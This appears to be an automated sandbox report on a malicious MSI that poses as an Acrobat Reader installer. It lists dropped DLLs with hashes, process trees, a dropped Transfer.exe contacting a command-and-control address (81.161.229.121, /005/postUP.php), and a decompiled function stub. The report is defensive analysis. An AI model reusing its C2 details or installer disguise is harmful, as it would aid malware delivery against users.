Joe Sandbox View:	Filename: autorizacaoBUWFZCZN.msi, Detection: malicious, Browse Filename: autorizacaoBUWFZCZN.msi, Detection: malicious, Browse Filename: , Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L....}.c.........."!..."..................................................................@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI839D.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	570784
Entropy (8bit):	6.45015034296188
Encrypted:	false
SSDEEP:	6144:j+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOJVafv5khoJQCmR+:j+SuPgAc8+MjGCCslegDTwX5/OCmR+
MD5:	2C9C51AC508570303C6D46C0571EA3A1
SHA1:	E3E0FE08FA11A43C8BCA533F212BDF0704C726D5
SHA-256:	FF86C76A8D5846B3A1AD58FF2FD8E5A06A84EB5899CDEE98E59C548D33335550
SHA-512:	DF5F1DEF5AAC44F39A2DFDE9C6C73F15F83A7374B4AD42B67E425CCB7AC99A64C5701B676AE46D2F7167A04A955158031A839E7878D100AAF8FAB0CE2059F127
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L....}.c.........."!..."..................................................................@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI842B.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	570784
Entropy (8bit):	6.45015034296188
Encrypted:	false
SSDEEP:	6144:j+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOJVafv5khoJQCmR+:j+SuPgAc8+MjGCCslegDTwX5/OCmR+
MD5:	2C9C51AC508570303C6D46C0571EA3A1
SHA1:	E3E0FE08FA11A43C8BCA533F212BDF0704C726D5
SHA-256:	FF86C76A8D5846B3A1AD58FF2FD8E5A06A84EB5899CDEE98E59C548D33335550
SHA-512:	DF5F1DEF5AAC44F39A2DFDE9C6C73F15F83A7374B4AD42B67E425CCB7AC99A64C5701B676AE46D2F7167A04A955158031A839E7878D100AAF8FAB0CE2059F127
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L....}.c.........."!..."..................................................................@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI8499.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1101216
Entropy (8bit):	6.479817481500629
Encrypted:	false
SSDEEP:	24576:f/MVN/SFo2Cit/I0Rn0rItmncIQy4t0VM+6RRO9qZFTvqPvO6Ezvs5lh:Mv0Rn0rItYcuwwERO9qZFTvqPvO6Ezv8
MD5:	7768D9D4634BF3DC159CEBB6F3EA4718
SHA1:	A297E0E4DD61EE8F5E88916AF1EE6596CD216F26
SHA-256:	745DE246181EB58F48224E6433C810FFBAA67FBA330C616F03A7361FB1EDB121
SHA-512:	985BBF38667609F6A422A22AF34D9382AE4112E7995F87B6053A683A0AAA647E17BA70A7A83B5E1309F201FC12A53DB3C13FFD2B0FAD44C1374FFF6F07059CBF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!...e...e...e......h............t......}...*...6......\|......z...e...K......_......d....%.d...e.M.d......d...Riche...................PE..L....~.c.........."!...".:...........B.......P......................................9.....@.............................t...4............................#.......:......p...................@...........@............P...............................text...>9.......:.................. ..`.rdata...L...P...N...>..............@..@.data...X...........................@....rsrc................h..............@..@.reloc...:.......<...n..............@..B........................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI8556.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	570784
Entropy (8bit):	6.45015034296188
Encrypted:	false
SSDEEP:	6144:j+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOJVafv5khoJQCmR+:j+SuPgAc8+MjGCCslegDTwX5/OCmR+
MD5:	2C9C51AC508570303C6D46C0571EA3A1
SHA1:	E3E0FE08FA11A43C8BCA533F212BDF0704C726D5
SHA-256:	FF86C76A8D5846B3A1AD58FF2FD8E5A06A84EB5899CDEE98E59C548D33335550
SHA-512:	DF5F1DEF5AAC44F39A2DFDE9C6C73F15F83A7374B4AD42B67E425CCB7AC99A64C5701B676AE46D2F7167A04A955158031A839E7878D100AAF8FAB0CE2059F127
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&r.gb..4b..4b..4.a.5o..4.a.5...4-o.5s..4-o.5z..4-o.5(..4.a.5{..4.a.5c..4.a.5E..4b..4...4.o.5...4.o.5c..4.ou4c..4b..4c..4.o.5c..4Richb..4................PE..L....}.c.........."!..."..................................................................@.....................................,....`...................#...p...b..8Y..p....................Y......xX..@...............<............................text...6........................... ..`.rdata..X...........................@..@.data...."...0......................@....rsrc........`.......&..............@..@.reloc...b...p...d..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI87B8.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	2114
Entropy (8bit):	5.405265346710125
Encrypted:	false
SSDEEP:	48:jxZOmYpA4rykAydnyB+myx085piycAX69Ay+ydT:jxlaA2QIdGi69LT
MD5:	1DB62C2A08157530ECE3DC54768B8928
SHA1:	1AA442264341DDA5753CEA7E979D3135EFD3655F
SHA-256:	C18419A2682698D69ACB1B55CCE990FFC62584056409036D2406B258AEA8762F
SHA-512:	8C7B3E68A7EEB16327B49F67AC64E90D5872CDB088D2CFE027DA1833025468B4BC5A36D66BF22CDC3489B0C012C44FA1F9E51D8FEA1FDFDF806D6B43064F48D9
Malicious:	false
Preview:	...@IXOS.@.....@..JV.@.....@.....@.....@.....@.....@......&.{A885824B-FF63-47EE-8A9E-C1B3FAA6C854}..Acrobat Reader..Fct63e39.msi.@.....@.....@.....@........&.{F1926830-DC49-4A34-9399-D3B31AA800D8}.....@.....@.....@.....@.......@.....@.....@.......@......Acrobat Reader......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]...@.......@........ProcessComponents%.Atualizando o registro de componentes...@.....@.....@.]....&.{89B1F9F7-8D20-44A2-9FE8-ECC26A8CF0B9}=.C:\Users\user\AppData\Roaming\Acrobat Reader\Acrobat Reader\.@.......@.....@.....@......&.{7F60C7AE-4947-4283-9AC6-C30F677CB007}2.01:\Software\Acrobat Reader\Acrobat Reader\Version.@.......@.....@.....@......&.{A5FC9F8D-BFA1-436E-8174-610300666563}%.C:\Users\user\Pictures\drivespan.dll.@.......@.....@.....@......&.{1782F7FC-AFB2-49C2-9271-CFB554C6A333}'.C:\Users\user\AppData\Local\Adobe Inc\.@.......@.....@.....@......&.{1E9B8214-708F-41E1-ABD5-8092DBBC276F}$.C:\Users

C:\Windows\Installer\SourceHash{A885824B-FF63-47EE-8A9E-C1B3FAA6C854}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1642391506527408
Encrypted:	false
SSDEEP:	12:JSbX72FjOAGiLIlHVRpfh/7777777777777777777777777vDHFzEJ/F1ptpwl0G:JAQI5bNElF
MD5:	2FBE61A6437C52049C3CB41C0CB6032C
SHA1:	BB1793144A3024E9DDBCB0D094F42BE5B1EAAB5A
SHA-256:	0DD4E75878B66E619F644C19A5B87368B830A01E59F168A4C3C561810BBFAA19
SHA-512:	DB9B8AC588F0662077301236B72BDFE4045F65B5A30AE6A0B5B6FAAC53680A5388BAAF7541A8D8632B02916E85164D06AEC0431261CD12B6B54AABB5B7DA3144
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5462910220019546
Encrypted:	false
SSDEEP:	48:Qz8Ph8uRc06WXJ4jT5DBfLLGvSCLLGRAECiCyjeoBLLGvSCLLGlTuj:jh81bjTzTgLJECWgL
MD5:	D1194DE9D106A41F19F0DD41E7F68293
SHA1:	38F8ED93D9F7309A1AA6C38C5E3FCB7B58127138
SHA-256:	DEA630227407E2A845057675E0BFDC7BE18733BC2C57F4B3C0DF93ED18165EC2
SHA-512:	20595BC6B919EB9B45943F7E7A3952425A1BE17D77D2C13DCA95AD644E0A5A852688F7F98D4847C1C75F178A34CDF9C1D6E0DFB5A84FB0293D86CE0675D46D26
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	79122
Entropy (8bit):	5.282033930190542
Encrypted:	false
SSDEEP:	192:jmXs969ozNSkk3peTBYeHt0tfoI9qsjl0urmwYyip:yXs9UogeWeH29qclhmwYyip
MD5:	EB227910F43B74B45D04892890B69DC9
SHA1:	271F4DCDD729F6A9417E38010520B04D23D44FE4
SHA-256:	B43A98A3FEC8ADA2006F0047887D004509E2B21110FA7426219ADF86F9792CE8
SHA-512:	2FD8D7D52E748559019793E2A977329A941430911E45411818B147D6586E63E29F5746CAFDED53194F3732D3AF1DAC0D4F6D0DCBAD63E0B185406E0E9E4C1C04
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 03:22:38.143 [320]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Outlook, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 03:22:38.159 [320]: ngen returning 0x00000000..07/23/2020 03:22:38.222 [3748]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Word, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 03:22:38.237 [3748]: ngen returning 0x00000000..07/23/2020 03:22:38.284 [64]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Common.Implementation, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 03:22:38.300 [64]:

C:\Windows\Temp\~DF147BAAEB4286EC57.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5462910220019546
Encrypted:	false
SSDEEP:	48:Qz8Ph8uRc06WXJ4jT5DBfLLGvSCLLGRAECiCyjeoBLLGvSCLLGlTuj:jh81bjTzTgLJECWgL
MD5:	D1194DE9D106A41F19F0DD41E7F68293
SHA1:	38F8ED93D9F7309A1AA6C38C5E3FCB7B58127138
SHA-256:	DEA630227407E2A845057675E0BFDC7BE18733BC2C57F4B3C0DF93ED18165EC2
SHA-512:	20595BC6B919EB9B45943F7E7A3952425A1BE17D77D2C13DCA95AD644E0A5A852688F7F98D4847C1C75F178A34CDF9C1D6E0DFB5A84FB0293D86CE0675D46D26
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF1492B57AD70E2A46.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.07063741867933411
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOc81iL9/F1bRX4Vky6lw:2F0i8n0itFzDHFzEJ/F1NTw
MD5:	9BCFFCB4015C8777519563792ECD1775
SHA1:	8AF409D166068C315C2EC224ED8DC13A591976B5
SHA-256:	454717887BB629AD7777ADD88827C027B95FB52EEE738FFB0A7F89E8421BF8F8
SHA-512:	C74FD359722ED07FD21946664F66DC9E5C11B7E28DA765DAF03F7B2AD65B06AD3F20D004CF7A81292D435B809795E17635FFDD953B0CEC1DB436D2085EA6F701
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF21817EECA17C0101.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF279B538C114F01E3.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2409680068975173
Encrypted:	false
SSDEEP:	48:6L0ukqI+CFXJbT57BfLLGvSCLLGRAECiCyjeoBLLGvSCLLGlTuj:I0NzTLTgLJECWgL
MD5:	D2811C53C64CC77B04C94C7EDCF5D7CB
SHA1:	5B78E8F95026EB53612B75BAC6252445D2C3A652
SHA-256:	C9B888CDE5EDAA0558CD55811CA13AF3C78A5FB1297E88C0A631F80120F39B9C
SHA-512:	099861D3BB4942C65E5389C526AEAFA775F1985823CB8B0320A73EE542B093102D4DF995D57AAF67B9B0D3BE94D28C023822E177A377D8CBF1BFA527E2603BDC
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF283994664753916C.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2409680068975173
Encrypted:	false
SSDEEP:	48:6L0ukqI+CFXJbT57BfLLGvSCLLGRAECiCyjeoBLLGvSCLLGlTuj:I0NzTLTgLJECWgL
MD5:	D2811C53C64CC77B04C94C7EDCF5D7CB
SHA1:	5B78E8F95026EB53612B75BAC6252445D2C3A652
SHA-256:	C9B888CDE5EDAA0558CD55811CA13AF3C78A5FB1297E88C0A631F80120F39B9C
SHA-512:	099861D3BB4942C65E5389C526AEAFA775F1985823CB8B0320A73EE542B093102D4DF995D57AAF67B9B0D3BE94D28C023822E177A377D8CBF1BFA527E2603BDC
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF709F1F9EF7627A8A.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.2409680068975173
Encrypted:	false
SSDEEP:	48:6L0ukqI+CFXJbT57BfLLGvSCLLGRAECiCyjeoBLLGvSCLLGlTuj:I0NzTLTgLJECWgL
MD5:	D2811C53C64CC77B04C94C7EDCF5D7CB
SHA1:	5B78E8F95026EB53612B75BAC6252445D2C3A652
SHA-256:	C9B888CDE5EDAA0558CD55811CA13AF3C78A5FB1297E88C0A631F80120F39B9C
SHA-512:	099861D3BB4942C65E5389C526AEAFA775F1985823CB8B0320A73EE542B093102D4DF995D57AAF67B9B0D3BE94D28C023822E177A377D8CBF1BFA527E2603BDC
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF777A9EC2E7C63F02.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5462910220019546
Encrypted:	false
SSDEEP:	48:Qz8Ph8uRc06WXJ4jT5DBfLLGvSCLLGRAECiCyjeoBLLGvSCLLGlTuj:jh81bjTzTgLJECWgL
MD5:	D1194DE9D106A41F19F0DD41E7F68293
SHA1:	38F8ED93D9F7309A1AA6C38C5E3FCB7B58127138
SHA-256:	DEA630227407E2A845057675E0BFDC7BE18733BC2C57F4B3C0DF93ED18165EC2
SHA-512:	20595BC6B919EB9B45943F7E7A3952425A1BE17D77D2C13DCA95AD644E0A5A852688F7F98D4847C1C75F178A34CDF9C1D6E0DFB5A84FB0293D86CE0675D46D26
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF7A0B9632FEC43B68.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF7D7E013AC691BA20.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF8F74856D07287FC3.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.13132606013145193
Encrypted:	false
SSDEEP:	48:SKxTeLLGvSCLLGOLLGvSCLLGRAECiCyjeoAM:ugLhgLJECL
MD5:	6BC9FA0A309116CE5C439776B9E80F33
SHA1:	5C41603E27F1CE684F35BCA8CE2AAFA63340B3A4
SHA-256:	CF8F54C9869C7AF98BA43B12AAE7C4DF03EAE4C8A46B5445ED32E993D1FDA988
SHA-512:	A59A4DD3977EE21500118A8F036526BB481EFE0CC9E1DD6CD252AEC2185A09971802CF9989F799D0144FA13D0628B891D65D32CDD9F0C412F2A2939DDDEF0F2C
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFBD2189742A9F779D.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFF0DECE919861EC87.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {F1926830-DC49-4A34-9399-D3B31AA800D8}, Number of Words: 10, Subject: Acrobat Reader, Author: Acrobat Reader, Name of Creating Application: Acrobat Reader (Evaluation Installer), Template: ;1046, Comments: A base dados do instalador contm a lgica e os dados necessrios para instalar o Acrobat Reader. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Entropy (8bit):	7.94129378454755
TrID:	Microsoft Windows Installer (77509/1) 52.18% Windows SDK Setup Transform Script (63028/2) 42.43% Generic OLE2 / Multistream Compound File (8008/1) 5.39%
File name:	Fct63e39.msi
File size:	19766784
MD5:	867c50852f18578fa033fa351ad79913
SHA1:	0ceba904d6ff7ad9696af3abd6d17a23645d9c40
SHA256:	01678f0b037b244a527b964aa9c32c5f7f554cbfb77305747cf42d5019775d4d
SHA512:	b089c45993c545135dd81a941618a95efc75a3b81df97df76cacfc22abc93cbe6c3d73f89c636c78e1bf7295ddd8606eb34e371753b4d92041b70f7f26f0000c
SSDEEP:	393216:9BhRuNbiYh8TB9GDpJb4UR6zCyIt0DwludpgK87gfnR3Ttf1wDAC3Zzp:n+biTTBgDpx6Qt0klur9ZJf1OAAZz
TLSH:	4A172311AD8BC636EA2D8177E578FA2F217ABEE3073084D767E8399A4DB04C15175F02
File Content Preview:	........................>.......................................................F.......c.......o.......................................p......................................................................................................................

File Icon


Icon Hash:	a2a0b496b2caca72

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 10, 2023 01:09:11.606333971 CET	49695	80	192.168.2.4	81.161.229.121
Feb 10, 2023 01:09:11.635530949 CET	80	49695	81.161.229.121	192.168.2.4
Feb 10, 2023 01:09:11.635920048 CET	49695	80	192.168.2.4	81.161.229.121
Feb 10, 2023 01:09:11.636234999 CET	49695	80	192.168.2.4	81.161.229.121
Feb 10, 2023 01:09:11.665426970 CET	80	49695	81.161.229.121	192.168.2.4
Feb 10, 2023 01:09:11.687221050 CET	80	49695	81.161.229.121	192.168.2.4
Feb 10, 2023 01:09:11.688909054 CET	49695	80	192.168.2.4	81.161.229.121
Feb 10, 2023 01:09:11.719311953 CET	80	49695	81.161.229.121	192.168.2.4
Feb 10, 2023 01:09:11.719424963 CET	49695	80	192.168.2.4	81.161.229.121

HTTP Request Dependency Graph

81.161.229.121

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49695	81.161.229.121	80	C:\Users\user\Pictures\Transfer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 10, 2023 01:09:11.636234999 CET	91	OUT	GET /005/postUP.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 81.161.229.121 Accept: text/html, / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Feb 10, 2023 01:09:11.687221050 CET	91	IN	HTTP/1.1 200 OK Date: Fri, 10 Feb 2023 00:09:11 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Content-Type: text/html; charset=UTF-8

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: msiexec.exePID: 5556, Parent PID: 3528

General

Target ID:	0
Start time:	01:08:25
Start date:	10/02/2023
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Fct63e39.msi"
Imagebase:	0x7ff6b1650000
File size:	66048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: msiexec.exePID: 2040, Parent PID: 576

General

Target ID:	1
Start time:	01:08:26
Start date:	10/02/2023
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff6b1650000
File size:	66048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: msiexec.exePID: 4212, Parent PID: 2040

General

Target ID:	2
Start time:	01:08:29
Start date:	10/02/2023
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding F98DBCD8EB795A8D118A247529EBDDF4
Imagebase:	0xbb0000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: Transfer.exePID: 2264, Parent PID: 2040

General

Target ID:	3
Start time:	01:08:32
Start date:	10/02/2023
Path:	C:\Users\user\Pictures\Transfer.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Pictures\Transfer.exe
Imagebase:	0x880000
File size:	138520 bytes
MD5 hash:	E04F15D35A1807C4D74D2538D5FE28C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: Transfer.exePID: 492, Parent PID: 3528

General

Target ID:	6
Start time:	01:09:22
Start date:	10/02/2023
Path:	C:\Users\user\Pictures\Transfer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Pictures\Transfer.exe"
Imagebase:	0x880000
File size:	138520 bytes
MD5 hash:	E04F15D35A1807C4D74D2538D5FE28C9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Transfer.exePID: 2264, Parent PID: 2040COMMON

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.5%
Total number of Nodes:	1931
Total number of Limit Nodes:	31

Executed Functions

Function 00881000 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 308
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00881000(struct HINSTANCE__* __ecx, void* __eflags) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v540;
				intOrPtr _v544;
